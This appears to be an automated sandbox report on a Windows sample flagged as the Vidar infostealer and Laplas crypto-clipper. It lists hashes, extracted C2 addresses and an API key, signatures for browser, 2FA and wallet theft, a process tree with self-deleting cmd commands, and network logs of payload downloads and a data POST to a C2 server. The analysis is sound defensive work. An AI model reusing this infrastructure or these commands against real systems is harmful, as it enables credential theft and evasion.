Analysis

  • max time kernel
    108s
  • max time network
    114s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230221-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-04-2023 11:40

General

  • Target

    b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe

  • Size

    471KB

  • MD5

    7726ff8db0d30ab03e9548ba7fe27446

  • SHA1

    6240309f1205990256778c7d1951a5b095806931

  • SHA256

    b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0

  • SHA512

    8faeffc97b9e12d5584c532eae7a62a1ff12edf9dc43c8c058c6bdbb4c367be1b47a6ee8da0932f4301f161de3aabb16b2300f436290dddbd5186e850770d19a

  • SSDEEP

    12288:DcZT8vz5dXe8c8j4i5RleOkDT6s9Qwze:DOT6k8siXtk/JQd

Malware Config

Extracted

Family

vidar

Version

3.4

Botnet

e749025c61b2caca10aa829a9e1a65a1

C2

https://steamcommunity.com/profiles/76561199494593681

https://t.me/auftriebs

Attributes
  • profile_id_v2

    e749025c61b2caca10aa829a9e1a65a1

  • user_agent

    Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0

Extracted

Family

laplas

C2

http://185.106.92.74

Attributes
  • api_key

    bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

Signatures

  • Laplas Clipper

    Laplas is a crypto wallet stealer with three variants written in Golang, C#, and C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
    "C:\Users\Admin\AppData\Local\Temp\b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe"
    1⤵
    • Checks computer location settings
    • Loads dropped DLL
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4108
    • C:\ProgramData\64403928983640567900.exe
      "C:\ProgramData\64403928983640567900.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\ProgramData\64403928983640567900.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:700
        • C:\Windows\system32\choice.exe
          choice /C Y /N /D Y /T 0
          4⤵
            PID:1968
      • C:\ProgramData\28613429787745026787.exe
        "C:\ProgramData\28613429787745026787.exe"
        2⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:4628
        • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe
          "C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          PID:2416
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe" & exit
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2200
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 6
          3⤵
          • Delays execution with timeout.exe
          PID:3376
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 4108 -s 2092
        2⤵
        • Program crash
        PID:1328
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 4108 -ip 4108
      1⤵
        PID:2772

      Network

      • flag-us
        DNS
        163.252.72.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        163.252.72.23.in-addr.arpa
        IN PTR
        Response
        163.252.72.23.in-addr.arpa
        IN PTR
        a23-72-252-163deploystaticakamaitechnologiescom
      • flag-us
        DNS
        228.249.119.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        228.249.119.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        71.31.126.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        71.31.126.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        95.221.229.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        95.221.229.192.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        t.me
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        8.8.8.8:53
        Request
        t.me
        IN A
        Response
        t.me
        IN A
        149.154.167.99
      • flag-nl
        GET
        https://t.me/auftriebs
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        149.154.167.99:443
        Request
        GET /auftriebs HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0
        Host: t.me
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Wed, 12 Apr 2023 11:40:18 GMT
        Content-Type: text/html; charset=utf-8
        Content-Length: 12361
        Connection: keep-alive
        Set-Cookie: stel_ssid=4ee4cb3f10cdc6e4a7_16922301135242178653; expires=Thu, 13 Apr 2023 11:40:18 GMT; path=/; samesite=None; secure; HttpOnly
        Pragma: no-cache
        Cache-control: no-store
        X-Frame-Options: ALLOW-FROM https://web.telegram.org
        Content-Security-Policy: frame-ancestors https://web.telegram.org
        Strict-Transport-Security: max-age=35768000
      • flag-de
        GET
        http://195.201.44.70/
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        195.201.44.70:80
        Request
        GET / HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.44.70
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 12 Apr 2023 11:40:18 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-de
        GET
        http://195.201.44.70/download.zip
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        195.201.44.70:80
        Request
        GET /download.zip HTTP/1.1
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.44.70
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 12 Apr 2023 11:40:18 GMT
        Content-Type: application/zip
        Content-Length: 2685679
        Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT
        Connection: keep-alive
        ETag: "631f30d3-28faef"
        Accept-Ranges: bytes
      • flag-de
        POST
        http://195.201.44.70/
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        195.201.44.70:80
        Request
        POST / HTTP/1.1
        X-Id: e749025c61b2caca10aa829a9e1a65a1
        X-Token: 000759fc24095bf4ea3a603e447ba563
        X-hwid: bb00a92e19a92127370785-7669410e-8e67-41c6-8402-8218-806e6f6e6963
        Content-Type: multipart/form-data; boundary=----3542125965940843
        User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
        Host: 195.201.44.70
        Content-Length: 98691
        Connection: Keep-Alive
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx
        Date: Wed, 12 Apr 2023 11:40:24 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: keep-alive
      • flag-us
        DNS
        99.167.154.149.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        99.167.154.149.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        22.249.124.192.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        22.249.124.192.in-addr.arpa
        IN PTR
        Response
        22.249.124.192.in-addr.arpa
        IN PTR
        cloudproxy10022sucurinet
      • flag-us
        DNS
        70.44.201.195.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        70.44.201.195.in-addr.arpa
        IN PTR
        Response
        70.44.201.195.in-addr.arpa
        IN PTR
        static7044201195clients your-serverde
      • flag-us
        DNS
        transfer.sh
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        8.8.8.8:53
        Request
        transfer.sh
        IN A
        Response
        transfer.sh
        IN A
        144.76.136.153
      • flag-de
        GET
        https://transfer.sh/get/lqTwP6/pipka.exe
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        144.76.136.153:443
        Request
        GET /get/lqTwP6/pipka.exe HTTP/1.1
        Host: transfer.sh
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Wed, 12 Apr 2023 11:40:25 GMT
        Content-Type: application/x-ms-dos-executable
        Content-Length: 4514816
        Connection: keep-alive
        Cache-Control: no-store
        Content-Disposition: attachment; filename="pipka.exe"
        Retry-After: Wed, 12 Apr 2023 13:40:24 GMT
        X-Made-With: <3 by DutchCoders
        X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
        X-Ratelimit-Limit: 10
        X-Ratelimit-Rate: 600
        X-Ratelimit-Remaining: 9
        X-Ratelimit-Reset: 1681299624
        X-Remaining-Days: n/a
        X-Remaining-Downloads: n/a
        X-Served-By: Proudly served by DutchCoders
        Strict-Transport-Security: max-age=63072000
      • flag-de
        GET
        https://transfer.sh/get/8n86mq/sima.exe
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        Remote address:
        144.76.136.153:443
        Request
        GET /get/8n86mq/sima.exe HTTP/1.1
        Host: transfer.sh
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0
        Date: Wed, 12 Apr 2023 11:40:27 GMT
        Content-Type: application/x-ms-dos-executable
        Content-Length: 7567360
        Connection: keep-alive
        Cache-Control: no-store
        Content-Disposition: attachment; filename="sima.exe"
        Retry-After: Wed, 12 Apr 2023 13:40:30 GMT
        X-Made-With: <3 by DutchCoders
        X-Ratelimit-Key: 127.0.0.1,154.61.71.13,154.61.71.13
        X-Ratelimit-Limit: 10
        X-Ratelimit-Rate: 600
        X-Ratelimit-Remaining: 9
        X-Ratelimit-Reset: 1681299630
        X-Remaining-Days: n/a
        X-Remaining-Downloads: n/a
        X-Served-By: Proudly served by DutchCoders
        Strict-Transport-Security: max-age=63072000
      • flag-us
        DNS
        153.136.76.144.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        153.136.76.144.in-addr.arpa
        IN PTR
        Response
        153.136.76.144.in-addr.arpa
        IN PTR
        transfersh
      • flag-us
        DNS
        67.55.52.23.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        67.55.52.23.in-addr.arpa
        IN PTR
        Response
        67.55.52.23.in-addr.arpa
        IN PTR
        a23-52-55-67deploystaticakamaitechnologiescom
      • flag-us
        DNS
        176.25.221.88.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        176.25.221.88.in-addr.arpa
        IN PTR
        Response
        176.25.221.88.in-addr.arpa
        IN PTR
        a88-221-25-176deploystaticakamaitechnologiescom
      • flag-us
        DNS
        123.108.74.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        123.108.74.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        209.205.72.20.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        209.205.72.20.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        157.123.68.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        157.123.68.40.in-addr.arpa
        IN PTR
        Response
      • flag-us
        DNS
        151.122.125.40.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        151.122.125.40.in-addr.arpa
        IN PTR
        Response
      • flag-de
        GET
        http://185.106.92.74/bot/regex
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/regex HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Wed, 12 Apr 2023 11:41:05 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 633
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396 HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Wed, 12 Apr 2023 11:41:05 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 2
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/regex
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/regex HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Wed, 12 Apr 2023 11:42:01 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 633
        Connection: keep-alive
      • flag-de
        GET
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        svcservice.exe
        Remote address:
        185.106.92.74:80
        Request
        GET /bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396 HTTP/1.1
        Host: 185.106.92.74
        Cache-Control: no-cache
        Response
        HTTP/1.1 200 OK
        Server: nginx/1.18.0 (Ubuntu)
        Date: Wed, 12 Apr 2023 11:42:01 GMT
        Content-Type: text/plain; charset=utf-8
        Content-Length: 2
        Connection: keep-alive
      • flag-us
        DNS
        74.92.106.185.in-addr.arpa
        Remote address:
        8.8.8.8:53
        Request
        74.92.106.185.in-addr.arpa
        IN PTR
        Response
        74.92.106.185.in-addr.arpa
        IN PTR
        instance25567waicorenetwork
      • 149.154.167.99:443
        https://t.me/auftriebs
        tls, http
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        1.6kB
        19.5kB
        24
        20

        HTTP Request

        GET https://t.me/auftriebs

        HTTP Response

        200
      • 195.201.44.70:80
        http://195.201.44.70/
        http
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        207.1kB
        2.8MB
        2065
        2019

        HTTP Request

        GET http://195.201.44.70/

        HTTP Response

        200

        HTTP Request

        GET http://195.201.44.70/download.zip

        HTTP Response

        200

        HTTP Request

        POST http://195.201.44.70/

        HTTP Response

        200
      • 144.76.136.153:443
        https://transfer.sh/get/8n86mq/sima.exe
        tls, http
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        412.0kB
        12.5MB
        8944
        8927

        HTTP Request

        GET https://transfer.sh/get/lqTwP6/pipka.exe

        HTTP Response

        200

        HTTP Request

        GET https://transfer.sh/get/8n86mq/sima.exe

        HTTP Response

        200
      • 20.189.173.6:443
        322 B
        7
      • 185.106.92.74:80
        http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396
        http
        svcservice.exe
        916 B
        2.3kB
        10
        9

        HTTP Request

        GET http://185.106.92.74/bot/regex

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/regex

        HTTP Response

        200

        HTTP Request

        GET http://185.106.92.74/bot/online?guid=UXINIZSV\\Admin&key=bc2dceabe69fa26dbf4dd8295d65e03e1990633a88c1c8410825c9266b239396

        HTTP Response

        200
      • 8.8.8.8:53
        163.252.72.23.in-addr.arpa
        dns
        72 B
        137 B
        1
        1

        DNS Request

        163.252.72.23.in-addr.arpa

      • 8.8.8.8:53
        228.249.119.40.in-addr.arpa
        dns
        73 B
        159 B
        1
        1

        DNS Request

        228.249.119.40.in-addr.arpa

      • 8.8.8.8:53
        71.31.126.40.in-addr.arpa
        dns
        71 B
        157 B
        1
        1

        DNS Request

        71.31.126.40.in-addr.arpa

      • 8.8.8.8:53
        95.221.229.192.in-addr.arpa
        dns
        73 B
        144 B
        1
        1

        DNS Request

        95.221.229.192.in-addr.arpa

      • 8.8.8.8:53
        t.me
        dns
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        50 B
        66 B
        1
        1

        DNS Request

        t.me

        DNS Response

        149.154.167.99

      • 8.8.8.8:53
        99.167.154.149.in-addr.arpa
        dns
        73 B
        166 B
        1
        1

        DNS Request

        99.167.154.149.in-addr.arpa

      • 8.8.8.8:53
        22.249.124.192.in-addr.arpa
        dns
        73 B
        113 B
        1
        1

        DNS Request

        22.249.124.192.in-addr.arpa

      • 8.8.8.8:53
        70.44.201.195.in-addr.arpa
        dns
        72 B
        129 B
        1
        1

        DNS Request

        70.44.201.195.in-addr.arpa

      • 8.8.8.8:53
        transfer.sh
        dns
        b8d15d856905852c376d2abfb4999d128e92a364366abd2c3a13886407b9c6e0.exe
        57 B
        73 B
        1
        1

        DNS Request

        transfer.sh

        DNS Response

        144.76.136.153

      • 8.8.8.8:53
        153.136.76.144.in-addr.arpa
        dns
        73 B
        98 B
        1
        1

        DNS Request

        153.136.76.144.in-addr.arpa

      • 8.8.8.8:53
        67.55.52.23.in-addr.arpa
        dns
        70 B
        133 B
        1
        1

        DNS Request

        67.55.52.23.in-addr.arpa

      • 8.8.8.8:53
        176.25.221.88.in-addr.arpa
        dns
        72 B
        137 B
        1
        1

        DNS Request

        176.25.221.88.in-addr.arpa

      • 8.8.8.8:53
        123.108.74.40.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        123.108.74.40.in-addr.arpa

      • 8.8.8.8:53
        209.205.72.20.in-addr.arpa
        dns
        72 B
        158 B
        1
        1

        DNS Request

        209.205.72.20.in-addr.arpa

      • 8.8.8.8:53
        157.123.68.40.in-addr.arpa
        dns
        72 B
        146 B
        1
        1

        DNS Request

        157.123.68.40.in-addr.arpa

      • 8.8.8.8:53
        151.122.125.40.in-addr.arpa
        dns
        73 B
        159 B
        1
        1

        DNS Request

        151.122.125.40.in-addr.arpa

      • 8.8.8.8:53
        74.92.106.185.in-addr.arpa
        dns
        72 B
        115 B
        1
        1

        DNS Request

        74.92.106.185.in-addr.arpa

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\28613429787745026787.exe

        Filesize

        7.2MB

        MD5

        c5e0fb4ecaa8a7481a283099d604f7a0

        SHA1

        df4b0c0cc823da2b0443076650c292b43dd9de33

        SHA256

        c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42

        SHA512

        375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57

      • C:\ProgramData\28613429787745026787.exe

        Filesize

        7.2MB

        MD5

        c5e0fb4ecaa8a7481a283099d604f7a0

        SHA1

        df4b0c0cc823da2b0443076650c292b43dd9de33

        SHA256

        c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42

        SHA512

        375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57

      • C:\ProgramData\28613429787745026787.exe

        Filesize

        7.2MB

        MD5

        c5e0fb4ecaa8a7481a283099d604f7a0

        SHA1

        df4b0c0cc823da2b0443076650c292b43dd9de33

        SHA256

        c6c03e97c5de0c9eb264e4914d8c7f64d7e3528cc696f613e451a294262f3c42

        SHA512

        375677d0cc802b09c7d1532d162a91a8eec4679f7639ef38dca9a9d3a03e20b3ab54707af7ffb138d00ec93ea4b34b6db0b33f365dc888ff9056c808a239bc57

      • C:\ProgramData\64403928983640567900.exe

        Filesize

        4.3MB

        MD5

        c4ab3149ef02a36d663699a8c541933e

        SHA1

        67088f5eff9ec575775b711c9e3650d12d7f4d5c

        SHA256

        0a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce

        SHA512

        88b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4

      • C:\ProgramData\64403928983640567900.exe

        Filesize

        4.3MB

        MD5

        c4ab3149ef02a36d663699a8c541933e

        SHA1

        67088f5eff9ec575775b711c9e3650d12d7f4d5c

        SHA256

        0a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce

        SHA512

        88b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4

      • C:\ProgramData\64403928983640567900.exe

        Filesize

        4.3MB

        MD5

        c4ab3149ef02a36d663699a8c541933e

        SHA1

        67088f5eff9ec575775b711c9e3650d12d7f4d5c

        SHA256

        0a0fbd6af9e5d110118f02b87f9a92f9f58fb100f6d9883d55a6aae6c548b4ce

        SHA512

        88b10f81b2cd273fefeffb4c2078807e89b4b756d50110b61e9f89092715f29ba8d1803f64bc971c1293dc624b92d0b7f05612ae661dd8d24e47d39047a4b7b4

      • C:\ProgramData\mozglue.dll

        Filesize

        593KB

        MD5

        c8fd9be83bc728cc04beffafc2907fe9

        SHA1

        95ab9f701e0024cedfbd312bcfe4e726744c4f2e

        SHA256

        ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

        SHA512

        fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

      • C:\ProgramData\nss3.dll

        Filesize

        2.0MB

        MD5

        1cc453cdf74f31e4d913ff9c10acdde2

        SHA1

        6e85eae544d6e965f15fa5c39700fa7202f3aafe

        SHA256

        ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

        SHA512

        dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

      • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe

        Filesize

        830.2MB

        MD5

        58c4c1e65779c5b0ee7e6409741c66bc

        SHA1

        2a4daebb8fd8a776e1066aa28ba98755b8277a1c

        SHA256

        2c286abfebc0b51165e0a0db67fb5b165a700b548b0d6bec58418c8d6322ddbb

        SHA512

        f98cc2e64c134c0783d4bae9cf11ed686abe7e3313ecf7e1e25bfee0c98f214d7f157814dfdecbb24464cf696757b8d632a3ce98819d5e1001e4ab35dfb19547

      • C:\Users\Admin\AppData\Roaming\telemetry\svcservice.exe

        Filesize

        830.2MB

        MD5

        58c4c1e65779c5b0ee7e6409741c66bc

        SHA1

        2a4daebb8fd8a776e1066aa28ba98755b8277a1c

        SHA256

        2c286abfebc0b51165e0a0db67fb5b165a700b548b0d6bec58418c8d6322ddbb

        SHA512

        f98cc2e64c134c0783d4bae9cf11ed686abe7e3313ecf7e1e25bfee0c98f214d7f157814dfdecbb24464cf696757b8d632a3ce98819d5e1001e4ab35dfb19547

      • memory/1668-229-0x0000000000E40000-0x0000000001CA3000-memory.dmp

        Filesize

        14.4MB

      • memory/2416-259-0x00000000012D0000-0x00000000012D1000-memory.dmp

        Filesize

        4KB

      • memory/2416-260-0x00000000014C0000-0x00000000014C1000-memory.dmp

        Filesize

        4KB

      • memory/2416-261-0x0000000000180000-0x0000000000CBA000-memory.dmp

        Filesize

        11.2MB

      • memory/4108-144-0x0000000061E00000-0x0000000061EF3000-memory.dmp

        Filesize

        972KB

      • memory/4108-246-0x0000000000400000-0x000000000081A000-memory.dmp

        Filesize

        4.1MB

      • memory/4108-220-0x0000000000400000-0x000000000081A000-memory.dmp

        Filesize

        4.1MB

      • memory/4108-134-0x00000000009B0000-0x0000000000A07000-memory.dmp

        Filesize

        348KB

      • memory/4628-241-0x00000000006E0000-0x00000000006E1000-memory.dmp

        Filesize

        4KB

      • memory/4628-242-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

        Filesize

        4KB

      • memory/4628-243-0x0000000000D10000-0x000000000184A000-memory.dmp

        Filesize

        11.2MB

      We care about your privacy.

      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.